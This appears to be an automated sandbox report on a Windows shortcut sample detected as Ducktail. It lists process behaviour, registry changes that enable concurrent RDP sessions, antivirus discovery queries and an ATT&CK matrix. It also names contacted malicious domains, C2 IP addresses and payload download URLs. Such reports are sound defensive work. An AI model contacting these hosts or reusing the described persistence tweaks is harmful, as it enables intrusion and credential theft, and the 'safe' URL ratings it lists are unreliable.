        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\Temp\svczHost.exeCode function: 17_2_00007FF70476BFE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,17_2_00007FF70476BFE0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Modifies security policies related information
        Source: C:\Windows\Temp\myRdpService.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa DisableRestrictedAdmin
        Source: powershell.exe, 00000002.00000002.3149187687.00000146F3662000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3147039096.0000013EF23A5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3779190095.000002AE66A22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: powershell.exe, 0000000A.00000002.3786281934.000002AE66A79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct

        Stealing of Sensitive Information

        barindex
        Yara detected Ducktail
        Source: Yara matchFile source: Process Memory Space: svczHost.exe PID: 9772, type: MEMORYSTR
        Source: Yara matchFile source: 00000002.00000002.3084642389.0000013EDADAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected Ducktail
        Source: Yara matchFile source: Process Memory Space: svczHost.exe PID: 9772, type: MEMORYSTR
        Source: Yara matchFile source: 00000002.00000002.3084642389.0000013EDADAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Allows multiple concurrent remote connection
        Source: C:\Windows\Temp\myRdpService.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fSingleSessionPerUser

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure1
        Spearphishing Link        		321
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		OS Credential Dumping1
        System Time Discovery        		1
        Remote Desktop Protocol        		1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts12
        Command and Scripting Interpreter        		11
        Windows Service        		11
        Windows Service        		2
        Deobfuscate/Decode Files or Information        		LSASS Memory2
        File and Directory Discovery        		Remote Desktop ProtocolData from Removable Media11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Service Execution        		Logon Script (Windows)11
        Process Injection        		1
        Obfuscated Files or Information        		Security Account Manager114
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive11
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts5
        PowerShell        		Login HookLogin Hook1
        Software Packing        		NTDS431
        Security Software Discovery        		Distributed Component Object ModelInput Capture4
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets11
        Process Discovery        		SSHKeylogging15
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        File Deletion        		Cached Domain Credentials241
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Masquerading        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
        Virtualization/Sandbox Evasion        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
        Process Injection        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551872 Sample: cOOhDuNWt7.lnk Startdate: 08/11/2024 Architecture: WINDOWS Score: 100 90 uyt1n8ded9fb380.com 2->90 92 chrome.cloudflare-dns.com 2->92 100 Malicious sample detected (through community Yara rule) 2->100 102 Windows shortcut file (LNK) starts blacklisted processes 2->102 104 Yara detected Ducktail 2->104 106 12 other signatures 2->106 11 cmd.exe 1 2->11         started        14 svczHost.exe 2->14         started        17 myRdpService.exe 2->17         started        signatures3 process4 dnsIp5 128 Windows shortcut file (LNK) starts blacklisted processes 11->128 130 Suspicious powershell command line found 11->130 132 Encrypted powershell cmdline option found 11->132 144 2 other signatures 11->144 20 powershell.exe 14 49 11->20         started        25 conhost.exe 1 11->25         started        84 C:\Windows\Temp\myRdpService.exe, PE32+ 14->84 dropped 134 Multi AV Scanner detection for dropped file 14->134 27 powershell.exe 14->27         started        29 cmd.exe 14->29         started        31 cmd.exe 14->31         started        33 7 other processes 14->33 86 206.206.126.252, 49790, 8008 HYPEENT-SJUS United States 17->86 88 23.88.71.29, 49789, 49791, 8000 ENZUINC-US United States 17->88 136 Allows multiple concurrent remote connection 17->136 138 Modifies security policies related information 17->138 140 Reads the Security eventlog 17->140 142 Reads the System eventlog 17->142 file6 signatures7 process8 dnsIp9 94 uyt1n8ded9fb380.com 172.67.137.62, 443, 49760, 49761 CLOUDFLARENETUS United States 20->94 78 C:\Users\user\AppData\...\wr03xjs0.cmdline, Unicode 20->78 dropped 116 Windows shortcut file (LNK) starts blacklisted processes 20->116 118 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 20->118 120 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 20->120 124 3 other signatures 20->124 35 cmd.exe 1 20->35         started        38 powershell.exe 3 27 20->38         started        40 csc.exe 3 20->40         started        43 conhost.exe 20->43         started        122 Loading BitLocker PowerShell Module 27->122 45 conhost.exe 27->45         started        47 net.exe 29->47         started        49 3 other processes 29->49 51 2 other processes 31->51 53 8 other processes 33->53 file10 signatures11 process12 file13 108 Windows shortcut file (LNK) starts blacklisted processes 35->108 110 Suspicious powershell command line found 35->110 112 Encrypted powershell cmdline option found 35->112 55 powershell.exe 43 35->55         started        59 conhost.exe 35->59         started        114 Loading BitLocker PowerShell Module 38->114 61 AcroRd32.exe 38->61         started        63 conhost.exe 38->63         started        82 C:\Users\user\AppData\Local\...\wr03xjs0.dll, PE32 40->82 dropped 65 cvtres.exe 1 40->65         started        67 net1.exe 47->67         started        signatures14 process15 file16 80 C:\Windows\Temp\svczHost.exe, PE32+ 55->80 dropped 126 Potential dropper URLs found in powershell memory 55->126 69 conhost.exe 55->69         started        71 WmiPrvSE.exe 55->71         started        73 RdrCEF.exe 61->73         started        signatures17 process18 process19 75 RdrCEF.exe 73->75         started        dnsIp20 96 chrome.cloudflare-dns.com 162.159.61.3, 443, 49775, 49776 CLOUDFLARENETUS United States 75->96 98 104.77.220.172, 443, 49777 AKAMAI-ASUS United States 75->98

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        cOOhDuNWt7.lnk8%ReversingLabs

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Windows\Temp\svczHost.exe16%ReversingLabsWin64.Malware.Generic

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://uyt1n8ded9fb380.com0%Avira URL Cloudsafe
        http://html4/loose.dtd0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c066b7fcc8d19123b48461b1b5d1cd9e0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f19dfb6c9d84850b111e90ce500%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/71d9165f3c9a29b4f9fd666440a5628d7bdaea493d607cf1c194857c9e9509ea850%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c8630240%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d7510%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/71d9165f3c9a29b4f9fd666440a5628d7bdaea493d607cf1c194857c9e9509ea85a7865658ff32ffa28c43f34e9f7b5c99dc12e70151602607e49269e25e548ff56b345bf7f9f9aafc5e37381b67bdcf26a917cd5c806adb42ab90c71b564ba17f10abcf18115f342c6e1065c1e853af0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec46908bbc655365f1557b986a778660e2192b4caaca811f3fa61268d807a76d0dd5d4112cfa6ad3e7314c91843f2cea3c900100c4cf95939e2af05452bbe95d756961d6e14e2026cebcf6a859fdcef1cd21d0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f10%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/StaticFile/RdpService/640%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/sybpc0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/c57c20654b4343be4907fbac7f1262d6a79cc73fd2886dcfe5fc8312754be0cde2b1d9df4d61425f4f3265d2ed6dd59d98ea5986f45ac87d0d6d6cc34b8132c20d03c81e994427de6fa0a00d9dad087cf427cb41294857e34f691ad6220a02daeda5b2881e8d53cf9b2b7b5bffebebda0%Avira URL Cloudsafe
        http://.css0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33b543072600841d338722d8be39e0fbed7d8f360f490a597da48fdbe0b3c26e45bedad6338962586c553b7cf7f7fc173c2a7dc525b9d1b673338dc56e13d8e74d8544e3a61b2c33131f73315a439626d30%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.pngXz-0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec46908bbc655365f1557b986a778660e2192b40%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file3/4a96c3f7097c69e170f8b4a479e7540e1d95f8254179e0d696fd65d88733fb6e3cc173312a2d5575f38f6acb98aba110ba056b63fe90668a9e4cd59e6c092e5e18fb8b8070924e6c51b4fcf8eda4fa0ed74b393d0d70927b6997b6ba5903a852/Windows%20Defender/16/16/user/2040%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33b50%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180e76bad689e35a3c9c5c0db73ce703e80%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/StaticFile/TermServiceTryRun/590%Avira URL Cloudsafe
        http://.jpg0%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
        http://206.206.126.252:8008/client/ws0%Avira URL Cloudsafe
        http://microsoft.coj0%Avira URL Cloudsafe
        https://go.micro0%Avira URL Cloudsafe
        http://www.microsoft.c0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/c57c20654b4343be4907fbac7f1262d6a79cc73fd2886dcfe5fc8312754be0cde20%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/d236daeb5918e564f4863398b715f01869e225c4b1e47494e277f9475d91f1c5610%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180ec5cd000%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file3/4a96c3f7097c69e170f8b4a479e7540e1d95f8254179e0d696fd65d88733fb6e3c0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de0%Avira URL Cloudsafe
        http://23.88.71.29:8000/client/ws0%Avira URL Cloudsafe
        http://uyt1n8ded9fb380.com/api/check0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/0e2b542dde5230d991123cf170512b0225ae8c373d66c8038f016679055f4d52290%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180ec5cd00cfed1263e3ebfcf33acd7e0e0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/0e2b542dde5230d991123cf170512b0225ae8c373d66c8038f016679055f4d5229f8d5ac1df1afd229806593a24a07475c330ced357e5b62ca14794fc90cf9b5b18130bb75e02c6ba1e793807fb6a969dd58fac8a5f2f62a9469dc681627f3d76f41fb2548f810a2297e414d6c9ab9660%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/StaticFile/RdpService/64h0%Avira URL Cloudsafe
        http://crl.glohc0%Avira URL Cloudsafe
        http://uyt1n8ded9fb380.com:443/x0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c066b7fc0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180e76bad60%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        chrome.cloudflare-dns.com
        		162.159.61.3
        		truefalse
          		high
          uyt1n8ded9fb380.com
          		172.67.137.62
          		truetrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f19dfb6c9d84850b111e90ce50false
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/file2/71d9165f3c9a29b4f9fd666440a5628d7bdaea493d607cf1c194857c9e9509ea85a7865658ff32ffa28c43f34e9f7b5c99dc12e70151602607e49269e25e548ff56b345bf7f9f9aafc5e37381b67bdcf26a917cd5c806adb42ab90c71b564ba17f10abcf18115f342c6e1065c1e853affalse
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c066b7fcc8d19123b48461b1b5d1cd9efalse
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec46908bbc655365f1557b986a778660e2192b4caaca811f3fa61268d807a76d0dd5d4112cfa6ad3e7314c91843f2cea3c900100c4cf95939e2af05452bbe95d756961d6e14e2026cebcf6a859fdcef1cd21dfalse
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/sybpcfalse
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/file3/4a96c3f7097c69e170f8b4a479e7540e1d95f8254179e0d696fd65d88733fb6e3cc173312a2d5575f38f6acb98aba110ba056b63fe90668a9e4cd59e6c092e5e18fb8b8070924e6c51b4fcf8eda4fa0ed74b393d0d70927b6997b6ba5903a852/Windows%20Defender/16/16/user/204false
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33b543072600841d338722d8be39e0fbed7d8f360f490a597da48fdbe0b3c26e45bedad6338962586c553b7cf7f7fc173c2a7dc525b9d1b673338dc56e13d8e74d8544e3a61b2c33131f73315a439626d3false
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/StaticFile/RdpService/64false
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/file2/c57c20654b4343be4907fbac7f1262d6a79cc73fd2886dcfe5fc8312754be0cde2b1d9df4d61425f4f3265d2ed6dd59d98ea5986f45ac87d0d6d6cc34b8132c20d03c81e994427de6fa0a00d9dad087cf427cb41294857e34f691ad6220a02daeda5b2881e8d53cf9b2b7b5bffebebdafalse
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180e76bad689e35a3c9c5c0db73ce703e8false
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/StaticFile/TermServiceTryRun/59false
            • Avira URL Cloud: safe
            		unknown
            http://206.206.126.252:8008/client/wsfalse
            • Avira URL Cloud: safe
            		unknown
            http://23.88.71.29:8000/client/wsfalse
            • Avira URL Cloud: safe
            		unknown
            http://uyt1n8ded9fb380.com/api/checkfalse
            • Avira URL Cloud: safe
            		unknown
            https://chrome.cloudflare-dns.com/dns-queryfalse
              		high
              https://uyt1n8ded9fb380.com/file2/0e2b542dde5230d991123cf170512b0225ae8c373d66c8038f016679055f4d5229f8d5ac1df1afd229806593a24a07475c330ced357e5b62ca14794fc90cf9b5b18130bb75e02c6ba1e793807fb6a969dd58fac8a5f2f62a9469dc681627f3d76f41fb2548f810a2297e414d6c9ab966false
              • Avira URL Cloud: safe
              		unknown
              https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180ec5cd00cfed1263e3ebfcf33acd7e0efalse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://html4/loose.dtdpowershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
